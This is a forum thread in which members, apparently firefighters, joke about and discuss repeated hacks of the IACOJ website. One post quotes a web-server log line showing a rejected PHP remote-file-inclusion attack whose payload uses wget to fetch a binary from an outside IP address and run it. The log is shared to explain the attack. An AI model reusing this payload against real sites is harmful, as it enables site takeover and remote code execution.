IACOJ hacked again.

[DeputyChiefGonzo]

For the third time in two weeks, some fracking hackers have hacked into the IACOJ website. :mad

Who wants to go to Turkey and hunt these mutts down with me?

[fireguy919]

Im in Cap. Lets go hunting!!!!!

[RoughRider]

Lets get em!!


RR

[spearsm]

What is it going to take to end this crap?

[Lewiston2FF]

I'm in!
Are they just arbitrarily picking the IACOJ site or are they targeting it for a particular reason?

[Dalmatian190]

Almost certainly it's just random.

They're almost certainly using some scanning software looking for sites with vulnerable versions of PHP Nuke. Good chance the hack itself is fully automated.

I would *think* the version of PHP Nuke and patching it would be the responsibility of the company that hosts IACOJ.

[Bones42]

or is it a consortium of firehouse.com users who's IACOJ membership was denied?

an attack from our own (FF's)?

(images of TH, Cdevoe, etc sitting in a dark cellar running through my mind)

[cdemarse]

I told you trojan horse would get his revenge

[CaptainS]

Hey Cap,

I have 19 other Recon members that have not much to at drill this weekend want us to pull an op?

[superchef]

Hey Cap,

I have 19 other Recon members that have not much to at drill this weekend want us to pull an op?

I'll provide the food.

[Dave1983]

I told you trojan horse would get his revenge

Well, since he is a 1% er, Im sure he could figure out how to do it.

[medicmaster]

I told you trojan horse would get his revenge

I always assumed he was a virus anyways....remember the trojanhorse virus a few years ago...maybe he really is a hacker in disguise.

[FlyingKiwi]

A sample of our Internet site log file. A PHP attach recorded and rejected

from IP Address 80.55.45.106
on Port 80

GET /index2.php option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.97.113.25/cmd.gif?&cmd=cd%20tmp;wget%20213.97.113 .25/giculz;chmod%20744%20giculz;./giculz;echo%20YYY;echo| 401 Mozilla/4.0+(compatible;+MSIE+6.0;+Win dows+NT+5.1

The first IP address the attack was from is out of Poland.

The URL http://213.97.113.25/cmd.gif is from Spain, Don't try it it is BS.

The object is to use a vulnerability in PHP to gain access as an Admin user to any PHP site.

Hackers set up to send a series of commands to any IP address they can PING a response from, once the appropriate responses to an attack are recieved and recorded, they can go back to the sites and "take over".

[rforsythe]

As a security engineer with experience patching and keeping phpbb sites secure, I'd be happy to help you guys out if you need it. Just shoot me a PM on here.

[CALFFBOU]

Sorry guys...it was me. I was just trying to get some money out of my ATM and hit the wrong PIN.

It shouldnt happen again...Bou

[pvfire424]

SHENANIGANS !!!!

Oh crud, I forgot my torch.

[MattyS]

rubber strikes again..

[Smoke20286]

Sorry guys, its gotta be hurting your daily hits, to be honest I haven't visited since the last hijack

[ChiefReason]

They don't have to hack.
They need to fill out an application.
If they want to get in that bad.
Do hackers get hacked?
CR

[Dalmatian190]

Only when we catch them.